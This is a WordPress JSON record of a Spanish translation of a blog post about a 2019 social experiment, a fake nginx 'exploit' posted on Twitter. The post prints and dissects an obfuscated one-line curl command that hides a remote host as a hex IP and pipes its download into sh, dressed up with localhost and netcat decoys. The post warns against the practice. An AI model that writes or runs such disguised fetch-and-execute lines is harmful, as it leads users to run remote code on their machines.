{"id":35126,"date":"2019-10-31T22:02:28","date_gmt":"2019-10-31T19:02:28","guid":{"rendered":"https:\/\/prohoster.info\/blog\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\/"},"modified":"2019-10-31T22:02:28","modified_gmt":"2019-10-31T19:02:28","slug":"uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","status":"publish","type":"post","link":"https:\/\/prohoster.info\/es\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","title":{"rendered":"El \u00e9xito del experimento social con un exploit falso para nginx","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p><i><b>Nota de traducci\u00f3n.<\/b>: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\">Autor<\/a><\/noindex> de la nota original, publicada el 1 de junio, decidi\u00f3 realizar un experimento entre aquellos interesados en la seguridad inform\u00e1tica. Para ello, prepar\u00f3 un exploit falso para una vulnerabilidad no divulgada en un servidor web y lo public\u00f3 en su Twitter. Sus suposiciones de ser desmantelado al instante por especialistas que notar\u00edan el enga\u00f1o en el c\u00f3digo no solo no se cumplieron... superaron todas las expectativas, y de manera contraria: el tweet recibi\u00f3 un apoyo enorme de numerosas personas que no verificaron su contenido.<\/i><\/p>\n<p><img decoding=\"async\" alt=\"El \u00e9xito del experimento social con un exploit falso para nginx\" src=\"\/wp-content\/uploads\/2019\/06\/20ff08c6f541176c68ef2c689b989389.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\n<b>TL;DR: nunca utilices la canalizaci\u00f3n de archivos en sh o bash. Es una excelente manera de perder el control sobre tu computadora.<\/b><noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<p>Quiero compartir con ustedes una breve historia sobre un PoC-exploit humor\u00edstico que fue creado el 31 de mayo. Surgi\u00f3 r\u00e1pidamente en respuesta a la noticia de <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">Alisa Esage Shevchenko<\/a><\/noindex>, miembro de <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thezdi\">Zero Day Initiative<\/a><\/noindex> (ZDI), sobre que pronto se revelar\u00eda informaci\u00f3n acerca de una vulnerabilidad en NGINX, que lleva a RCE (ejecuci\u00f3n remota de c\u00f3digo). Dado que NGINX es la base de muchos sitios web, la noticia deb\u00eda tener el efecto de una bomba. Pero debido a los retrasos en el proceso de 'divulgaci\u00f3n responsable' de informaci\u00f3n, los detalles del incidente no fueron conocidos; tal es el procedimiento est\u00e1ndar de ZDI.<\/p>\n<p><img decoding=\"async\" alt=\"El \u00e9xito del experimento social con un exploit falso para nginx\" src=\"\/wp-content\/uploads\/2019\/06\/fba47177ff2a2d05db7942f229e145b0.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\/status\/1134400951043874816\">Tweet<\/a><\/noindex> sobre la divulgaci\u00f3n de la vulnerabilidad en NGINX<\/i><\/p>\n<p>Al finalizar el trabajo en una nueva t\u00e9cnica de ofuscaci\u00f3n en curl, cit\u00e9 el tweet original y 'filtr\u00e9 un PoC funcional', compuesto por una l\u00ednea de c\u00f3digo, supuestamente utilizando la vulnerabilidad descubierta. Por supuesto, fue un completo enga\u00f1o. Pens\u00e9 que me desenmascarar\u00edan de inmediato, y que en el mejor de los casos recibir\u00eda un par de retweets (y eso estar\u00eda bien).<\/p>\n<p><img decoding=\"async\" alt=\"El \u00e9xito del experimento social con un exploit falso para nginx\" src=\"\/wp-content\/uploads\/2019\/06\/30c8394a4bd7a151828bc3459f18f2f6.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\/status\/1134559331989434368\">Tweet<\/a><\/noindex> con el exploit falso<\/i><\/p>\n<p>Sin embargo, no pod\u00eda imaginar lo que sucedi\u00f3 despu\u00e9s. La popularidad de mi tweet se dispar\u00f3. Sorprendentemente, hasta el momento (15:00 MSK del 1 de junio) todav\u00eda hay muy pocos que han comprendido que es una falsificaci\u00f3n. Muchos lo retuitean sin verificar (sin mencionar disfrutar de la hermosa gr\u00e1fica ASCII que genera).<\/p>\n<p><img decoding=\"async\" alt=\"El \u00e9xito del experimento social con un exploit falso para nginx\" src=\"\/wp-content\/uploads\/2019\/06\/a22501843edc07cf0dc49b698b1048c2.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>\u00a1Miren qu\u00e9 belleza!<\/i><\/p>\n<p>Aunque todos estos ciclos y colores son magn\u00edficos, est\u00e1 claro: para verlos, la gente ejecutaba el c\u00f3digo en su propia m\u00e1quina. Afortunadamente, los navegadores funcionan de manera similar, y sumado al hecho de que no necesito problemas legales, el c\u00f3digo escondido en mi sitio solo hac\u00eda llamadas echo, sin intentar establecer o ejecutar ning\u00fan c\u00f3digo adicional.<\/p>\n<p>Una peque\u00f1a digresi\u00f3n: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/netspooky\">netspooky<\/a><\/noindex>, <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/dnoiz1\">dnz<\/a><\/noindex>, yo y otros chicos del equipo <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thugcrowd\">Thugcrowd<\/a><\/noindex> hemos estado jugando durante un tiempo con diferentes formas de ofuscar los comandos curl, porque es divertido... y somos geeks. netspooky y dnz descubrieron algunas nuevas formas que me parecieron extremadamente prometedoras. Me un\u00ed a la diversi\u00f3n e intent\u00e9 agregar conversiones de IP en decimal al conjunto de trucos. Result\u00f3 que la IP tambi\u00e9n se puede convertir a formato hexadecimal. Adem\u00e1s, curl y la mayor\u00eda de otras herramientas NIX aceptan encantados las IP hexadecimales. As\u00ed que solo era necesario crear una l\u00ednea de comando convincente y que pareciera segura. Al final, me qued\u00e9 con esta:<\/p>\n<pre><code class=\"plaintext\">curl -gsS https:\/\/127.0.0.1-OR-VICTIM-SERVER:443\/..\/..\/..\/\/nginx-handler?\/usr\/lib\/nginx\/modules\/ngx_stream_module.so:127.0.0.1:80:\/bin\/sh'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc \/dev\/tcp\/localhost<\/code><\/pre>\n<p><\/p>\n<h2>La ingenier\u00eda socioelectr\u00f3nica (S.E.E.) es m\u00e1s que solo phishing.<\/h2>\n<p>\nLa seguridad y la familiaridad fueron parte fundamental de este experimento. Creo que fueron las que llevaron a su \u00e9xito. La l\u00ednea de comando claramente implicaba seguridad, haciendo referencia a '127.0.0.1' (el conocido localhost). Se considera que localhost es seguro y que los datos en \u00e9l nunca abandonan su computadora.<\/p>\n<p>La familiaridad fue el segundo componente clave de S.E.E. en el experimento. Dado que la audiencia objetivo consist\u00eda principalmente en personas familiarizadas con los fundamentos de la seguridad inform\u00e1tica, era importante crear un c\u00f3digo cuyas partes parecieran conocidas y familiares (y por tanto seguras). Tomar elementos de viejas conceptos de exploits y combinarlos de una manera inusual result\u00f3 ser bastante exitoso.<\/p>\n<p>A continuaci\u00f3n se presenta un desglose detallado de la l\u00ednea de un solo comando. <i>Todo en esta lista es <b>cosm\u00e9tico<\/b>, y pr\u00e1cticamente no se requiere nada para que funcione realmente.<\/i><\/p>\n<p>\u00bfCu\u00e1les son los componentes que realmente se necesitan? Son <code>-gsS<\/code>, <code>-O 0x0238f06a<\/code>, <code>|sh<\/code> y el propio servidor web. El servidor web no conten\u00eda ninguna instrucci\u00f3n maliciosa, simplemente transmit\u00eda gr\u00e1ficos ASCII mediante comandos <code>echo<\/code> en el script incluido en <code>index.html<\/code>. Cuando un usuario ingresaba una cadena con <code>|sh<\/code> en el medio, <code>index.html<\/code> se cargaba y ejecutaba. Afortunadamente, los guardianes del servidor web no ten\u00edan malas intenciones.<\/p>\n<ul>\n<li> <code>..\/..\/..\/%00<\/code> \u2014 representa una salida fuera del directorio;<\/li>\n<li> <code>ngx_stream_module.so<\/code> \u2014 la ruta a un m\u00f3dulo aleatorio de NGINX;<\/li>\n<li> <code>\/bin\/sh%00&lt;'protocol:TCP'<\/code> \u2014 supuestamente estamos ejecutando <code>\/bin\/sh<\/code> en la m\u00e1quina objetivo y redirigiendo la salida a un canal TCP;<\/li>\n<li> <code>-O 0x0238f06a#PLToffset<\/code> \u2014 ingrediente secreto, complementado <code>#PLToffset<\/code>, para parecerse a un desplazamiento de memoria, de alguna manera contenido en PLT;<\/li>\n<li> <code>|sh;<\/code> \u2014 otro fragmento importante. Necesit\u00e1bamos redirigir la salida a sh\/bash para ejecutar el c\u00f3digo que ven\u00eda del servidor web atacante ubicado en <code>0x0238f06a<\/code> (<code>2.56.240.x<\/code>);<\/li>\n<li> <code>nc \/dev\/tcp\/localhost<\/code> \u2014 un placeholder, donde netcat se refiere a <code>\/dev\/tcp\/localhost<\/code>, para que todo pareciera seguro de nuevo. En realidad, no hace nada y se incluye en la cadena por motivos est\u00e9ticos.<\/li>\n<\/ul>\n<p>\nAqu\u00ed termina la decodificaci\u00f3n del script de una sola l\u00ednea y la discusi\u00f3n sobre aspectos de la \"ingenier\u00eda socio-electr\u00f3nica\" (phishing ingenioso).<\/p>\n<h2>Configuraci\u00f3n del servidor web y medidas de contrarresto<\/h2>\n<p>\nDado que la gran mayor\u00eda de mis suscriptores son expertos en ciberseguridad\/hackers, decid\u00ed hacer que el servidor web fuera un poco m\u00e1s resistente a las manifestaciones de \"inter\u00e9s\" de su parte, simplemente para que tuvieran algo que hacer (y configurar era divertido). No voy a enumerar todas las trampas aqu\u00ed, ya que el experimento a\u00fan contin\u00faa, pero aqu\u00ed hay algunas cosas que hace el servidor:<\/p>\n<ul>\n<li> Monitorea activamente los intentos de difusi\u00f3n en ciertas redes sociales y presenta diversas miniaturas de previsualizaci\u00f3n para alentar al usuario a hacer clic en el enlace.<\/li>\n<li> Redirige a Chrome\/Mozilla\/Safari\/etc. a un tr\u00e1iler de Thugcrowd en lugar de mostrar el script de shell.<\/li>\n<li> Controla las SE\u00d1ALES EXPL\u00cdCITAS de intrusi\u00f3n\/hacking, tras lo cual comienza a redirigir las solicitudes a servidores de la NSA (\u00a1ja!).<\/li>\n<li> Instala un troyano, as\u00ed como un rootkit de BIOS en todas las computadoras cuyos usuarios visitan el host desde un navegador normal (\u00a1es una broma!).<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"El \u00e9xito del experimento social con un exploit falso para nginx\" src=\"\/wp-content\/uploads\/2019\/06\/8ea3f0c6e2e303bef6f9ba73370d6cf1.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Una peque\u00f1a parte de antimedidas<\/i><\/p>\n<p>En este caso, mi \u00fanico objetivo era aprender algunas capacidades de Apache \u2014en particular, las geniales reglas de redirecci\u00f3n de solicitudes\u2014 y pens\u00e9: \u00bfpor qu\u00e9 no?<\/p>\n<h2>Exploit de NGINX (\u00a1real!)<\/h2>\n<p>\nS\u00edguenos en <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">@alisaesage<\/a><\/noindex> en Twitter y sigan el incre\u00edble trabajo de ZDI en la mitigaci\u00f3n de vulnerabilidades reales y oportunidades de explotaci\u00f3n en NGINX. Su trabajo siempre me ha fascinado y agradezco a Alice por su paciencia con todas las menciones y notificaciones causadas por mi tuit est\u00fapido. Afortunadamente, tambi\u00e9n trajo alg\u00fan beneficio: ayud\u00f3 a aumentar la conciencia sobre las vulnerabilidades de NGINX, as\u00ed como sobre los problemas provocados por el abuso de curl.<br \/>\n<br \/>Fuente: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/flant\/blog\/454700\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u043c. \u043f\u0435\u0440\u0435\u0432.: \u0410\u0432\u0442\u043e\u0440 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043c\u0435\u0442\u043a\u0438, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 1 \u0438\u044e\u043d\u044f, \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043a \u043d\u0435\u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0438 \u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u043b \u0435\u0433\u043e \u0432 \u0441\u0432\u043e\u0451\u043c \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435. \u0415\u0433\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u2014 \u0431\u044b\u0442\u044c \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0451\u043d\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0432\u0438\u0434\u044f\u0442 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u044b\u0439 \u043e\u0431\u043c\u0430\u043d \u0432 \u043a\u043e\u0434\u0435, \u2014 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b\u0438\u0441\u044c\u2026 \u041e\u043d\u0438 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0438 \u0432\u0441\u0435 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":26410,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-35126","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/es\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"es_ES\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/es\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47\u00c9xito del experimento social con un exploit falso para nginx | ProHoster","description":"Ej.","canonical_url":"https:\/\/prohoster.info\/es\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"es_ES","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster","og:description":"\u041f\u0440\u0438\u043c.","og:url":"https:\/\/prohoster.info\/es\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-10-31T19:02:28+00:00","article:modified_time":"2019-10-31T19:02:28+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"35126","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-21 21:57:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 22:59:48","updated":"2026-01-21 21:57:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts\/35126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/comments?post=35126"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts\/35126\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/media\/26410"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/media?parent=35126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/categories?post=35126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/tags?post=35126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}